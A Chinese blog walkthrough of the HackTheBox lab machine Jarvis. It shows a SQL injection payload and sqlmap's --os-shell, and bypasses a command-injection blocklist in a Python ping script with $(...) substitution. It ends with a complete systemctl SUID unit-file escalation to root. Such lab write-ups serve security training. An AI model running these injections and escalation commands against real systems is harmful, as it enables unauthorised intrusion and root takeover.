Hackthebox-Jarvis (Machine Maker: manulqwerty & Ghostpp7)

最新推荐文章于 2022-11-28 20:28:31 发布
最新推荐文章于 2022-11-28 20:28:31 发布
阅读量652 收藏
点赞数
分类专栏: WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43202322/article/details/101025203
版权

目录

前言

  • IP: 10.10.10.143
  • 友好的盒子

0x00 注入注入

在web页面逛逛,在预定房间页面,

  • url: “http://10.10.10.143/room.php?cod=2

这不测试一下注入枉自为人了,很快可以发现这是个完全没有过滤的数字型注入:

  • payload: “2 and sleep(5)

成功延时,那还有啥好说的,直接sqlmap一把梭
在这里插入图片描述
试下命令执行,加上 “- -os-shell”,获得一个shell在这里插入图片描述

0x01提权

对于这个盒子主要有两个可以用点

  • sudo -l
  • find / -perm -u+s -type f 2>/dev/null

有一个python脚本可以利用,但是只能sudo以pepper的身份执行
在这里插入图片描述
systemctl十分抢眼哦,拥有suid类型权限
在这里插入图片描述
所以思路就很清晰了,首先利用脚本升级为pepper,然后利用suid提权为root

  1. python脚本
    审计一下,很容易发现其中的漏洞
forbidden = ['&', ';', '-', '`', '||', '|']                                                                                                                                        
   command = input('Enter an IP: ')                                                                                                                                                   
   for i in forbidden:                                                                                                                                                                
       if i in command:                                                                                                                                                               
           print('Got you')                                                                                                                                                           
           exit()                                                                                                                                                                     
   os.system('ping ' + command)

我们只需要绕过forbidden即可进行命名执行,查了查可以通过如下格式绕过:

  • ping 0.0.0.0 $(id)
  • sudo -u pepper ./simpler.py

执行id成功
在这里插入图片描述
但是但是但是,千万别忘了forbidden这玩意儿还在呢,所以管道符,减号都没法用,直接弹shell可能不行,但是可以直接运行shell脚本呀,我们可以写个shell script然后运行就行了。
在这里插入图片描述

  1. suid

利用suid或sudo

sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

如果未能成功,可使用:

systemctl status <service_name>

查看原因在这里插入图片描述
成功拿到root权限

有一个很好的linux信息扫描的脚本:LinuxEnum
https://www.rebootuser.com/?p=1758

总结

思路清晰的盒子,我很喜欢!加油学习呀!

Just1ceP4rtn3r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
hackthebox- Jarvis(考点:sql注入/mysql/systemct提权)不用sqlmap
冬萍子癸水
04-14 500
此靶机大多数人用的sqlmap。针对oscp,本文章未用sqlmap。其实现实场景中用sqlmap的也不多,会封IP的,不会让你扫来扫去。所以学习手工注入也很必要。在手工注入里也可以利用文件包含漏洞。 nmap 很常规,一开始又没ssh密码,当然是从80网页开始搜集信息。以及dirbuster扫它 发现phpadmin,但是没密码,继续看80 像这种改一个展示的东西,网址里的数字就变了一个,这...
arya-jarvis-doc:Arya Jarvis:预测为开发人员节省更多时间和生产力(文档)
02-04
7. **插件与扩展**:如果Arya Jarvis支持,可能会有对可用插件的介绍,如`prettier`用于代码格式化,`docsify`用于文档生成,以及`check-port`用于端口检查等。 **标签解析**: - **frontend**:表明Arya Jarvis...
【Hack The Box】linux练习-- Jarvis
人间体佐菲的博客
11-21 333
【Hack The Box】linux练习-- Jarvis
Hack the box靶机 Jarvis
菜浪马废的博客
05-23 262
有sql注入 查看到是7列 2345位置是有回显的 说实话我今天有点累了 好想用sqlmap啊 DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 imissyou 看到一个.py脚本 执行ping命令 有了user的权限 什么也看不见 nc一下 ...
靶机渗透_hackthebox__jarvis -7
qq_34717555的博客
11-11 566
目标IP:10.10.10.143 Nmap scan report for supersecurehotel.htb (10.10.10.143) Host is up (0.28s latency). Not shown: 939 closed ports, 58 filtered ports PORT STATE SERVICE VERSION 22/tcp open ss...
No.165-HackTheBox-Linux-Jarvis-Walkthrough渗透学习
qq_34801745的博客
07-18 255
** HackTheBox-Linux-Jarvis-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/194 靶机难度:中级(4.7/10) 靶机发布日期:2019年9月9日 靶机描述: Jarvis is a medium difficulty Linux box running a web server, which has DoS and brute force protection enabled. A page
贝岭的matlab的代码-jarvis-calendar:贾维斯日历
06-16
Jarvis: Je regarde. Jarvis: Vos 3 prochains &eacute;v&eacute;nements sont : Jarvis: Aujoud&#39;hui &agrave; 19 heure, Repas chez la belle-m&egrave;re. Jarvis: ... You: Ajoute-moi un &eacute;v&eacute;nement Jarvis: Oui bien s&ucirc;r, quel est le...
My-jarvis-Assistant:用Python编写我自己的助手Jarvis
04-01
我的贾维斯助手用Python编写我自己的助手Jarvis
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
DFT的matlab源代码-jarvis-tools-notebooks:jarvis工具笔记本
05-26
DFT的matlab源代码 JARVIS-Tools笔记本:Jupyter / Google-Colab笔记本集合 要启动Colab笔记本,请单击它们上方的colab图像 有关更多详细信息,请查看我们的最新文章:
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6435
Hack The Box,一款有意思的渗透测试平台
Hack The Box -----------------------Active
大方子
12-16 6910
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
Hackthebox入门
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Hackthebox(1)系列持续更新
FryhRx的博客
04-14 4686
Hackthebox第一关 文章目录Hackthebox第一关前言一、Hackthebox配置openvpn?配置openvpn二、第0层(简单)终端弄好以后点击产卵机,然后会给你创建一个实例问题 1问题 2问题 3问题 4问题 5问题 6问题 7问题 82.拿flag总结 前言 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Hackthebox配置openvpn? Hackthebox是国外的一个靶场。 配置
Hack the box invited code(邀请码获取)
热门推荐
StriveBen的博客
03-15 4万+
0x00 Hack The Box 一个在线的渗透测试平台。 0x01 访问网址 https://www.hackthebox.eu/invite 0x02 打开console ,输入 makeInviteCode()后, 在post响应中获取到一串base64编码: 注意这里有的是 Va beqre gb trarengr gur vaivgr pbqr,...
HackTheBox系列——注册
0pt1mus
02-29 2152
转自个人博客:0pt1mus 最近在看杨老师的网络安全自学篇系列,再看到后面的时候,杨老师介绍了一个在线的靶场:Hack The Box,亲身体验了一下,感觉是一个检验和提升自己的渗透能力,因此介绍给大家。 参考: 杨老师网络安全专栏 Hack The Box官网 0x00 简介 Hack The Box是一个在线平台,可让您测试和提高网络安全技能。负责任地使用它,不要破坏您的同事… 可以理解该平...
【HTB系列】靶机Mischief的渗透测试详解
大方子
01-06 3219
这次的目标靶机是 hackthebox的 Mischief IP地址:10.10.10.92 ====================================================================================== 首先我们用nmap对目标机器进行扫描 nmap -T4 -sV -p- 10.10.10.92 我们访...
Hackthebox-Craft (Machine Maker: rotarydrone)
weixin_43202322的博客
09-19 2664
目录前言0x00 nmap扫描0x01 web页面入手0x01 搜索数据库0x02 继续搜集repo0x03 提权第一种第二种参考资料 前言 IP: 10.10.10.110 很接近真实环境的盒子,全靠信息泄露,(做了好久 0x00 nmap扫描 ports service 22 ssh 443 ssl/http 0x01 web页面入手 Craft aims ...
Hackthebox-OneTwoSeven (Machine Maker: jkr)
weixin_43202322的博客
09-05 663
目录前言0x00 nmap扫描0x01 web0x02 端口转发0x03 后门deb1. 使用burpsuite搭建代理服务器在option 新增一个Edit proxy listener ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190905164311739.png?x-oss-process=image/watermark,type_ZmFuZ3p...
idealTree:jarvis1: sill idealTree buildDeps
最新发布
02-22
idealTree是一个用于管理项目依赖关系的工具。它可以帮助您分析和解决项目中的依赖冲突问题,并提供一个清晰的依赖树视图。 在idealTree中,buildDeps是一个命令,用于构建项目的依赖树。通过运行该命令,idealTree...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值